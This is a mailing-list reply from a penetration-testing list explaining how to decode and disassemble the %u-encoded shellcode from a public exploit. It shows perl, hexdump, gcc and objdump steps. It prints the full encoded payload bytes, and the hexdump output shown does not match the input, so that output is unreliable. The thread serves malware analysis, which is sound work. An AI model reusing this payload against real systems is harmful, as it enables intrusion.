Penetration Testing mailing list archives
Re: Analyzing Shellcode
From: Joshua Gimer <jgimer () gmail com>
Date: Thu, 5 Nov 2009 16:12:10 -0700
Try the technique in this post: http://isc.sans.org/diary.html?storyid=4972

Macintosh-5:/tmp joshuagimer$ cat >> shellcode.txt
%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580
Macintosh-5:/tmp joshuagimer$ cat shellcode.txt | perl -pe 's/%(..)(..)/chr(hex($2)).chr(hex($1))/ge' > shellcode
Macintosh-5:/tmp joshuagimer$ hexdump -Cv shellcode
00000000 92 00 62 fb 00 31 cb 00 64 53 00 36 b9 00 62 9c |..b?.1?.dS.6?.b.|
00000010 00 35 47 00 34 af 00 34 a8 00 33 1f 00 63 b6 00 |.5G.4?.4?.3..c?.|
00000020 61 a0 00 33 40 00 37 73 00 30 cf 00 66 8b 00 62 |a?.3@.7s.0?.f..b|
00000030 7f 00 66 4f 00 65 b7 00 34 d0 00 35 b8 00 62 28 |..fO.e?.4?.5?.b(|
00000040 00 64 89 00 33 cc 00 64 5a 00 32 7b 00 38 29 00 |.d..3?.dZ.2{.8).|
00000050 30 63 00 61 4e 00 39 aa 00 34 58 00 64 5a 00 33 |0c.aN.9?.4X.dZ.3|
00000060 f4 00 63 b4 00 36 b8 00 63 0a 00 64 84 00 34 24 |?.c?.6?.c..d..4$|
00000070 00 61 b8 00 31 80 00 64 74 00 38 bd 00 34 c4 00 |.a?.1..dt.8?.4?.|
00000080 36 39 00 32 34 00 61 04 00 66 86 00 65 c8 00 65 |69.24.a..f..e?.e|
00000090 20 00 37 6b 00 34 4d 00 34 08 00 34 cb 00 61 78 | .7k.4M.4..4?.ax|
000000a0 00 32 17 00 63 8c 00 30 a8 00 63 4a 00 36 72 00 |.2..c..0?.cJ.6r.|
000000b0 31 d2 00 65 0b 00 30 d2 00 63 0a 00 38 05 00 62 |1?.e..0?.c..8..b|
000000c0 3f 00 34 4e 00 38 a9 00 63 b8 00 35 dc 00 62 07 |?.4N.8?.c?.5?.b.|
000000d0 00 64 d9 00 32 9e 00 31 63 00 31 58 00 30 0a |.d?.2..1c.1X.0.|
000000df
Macintosh-5:/tmp joshuagimer$ cat shellcode | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge' > shellcode.c
Macintosh-5:/tmp joshuagimer$ vim shellcode.c
Macintosh-5:/tmp joshuagimer$ gcc -O0 -fno-inline shellcode.c -o shellcode2
Macintosh-5:/tmp joshuagimer$ objdump --disassembler-options=intel -D shellcode2 | less

You will then see your shellcode under the following section:

08048484 <_IO_stdin_used>:

Josh

On Thu, Nov 5, 2009 at 10:38 AM, cAs <writemecas () googlemail com> wrote:
Good evening everybody,

I am trying to analyze the shellcode used in this exploit: http://www.milw0rm.com/exploits/7477

If I echo the unescaped shellcode I only get weird Chinese (I think) letters. What's the right way to analyze what kind of shellcode is being used and what command is being executed by it?

Greetings,
cAs

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------
--
Thx
Joshua Gimer
Current thread:
- Analyzing Shellcode cAs (Nov 05)
- Re: Analyzing Shellcode NiTRo (Nov 09)
- Re: Analyzing Shellcode Joshua Gimer (Nov 09)
- Re: Analyzing Shellcode Michel Chamberland (Nov 09)
- RE: Analyzing Shellcode Paul Melson (Nov 12)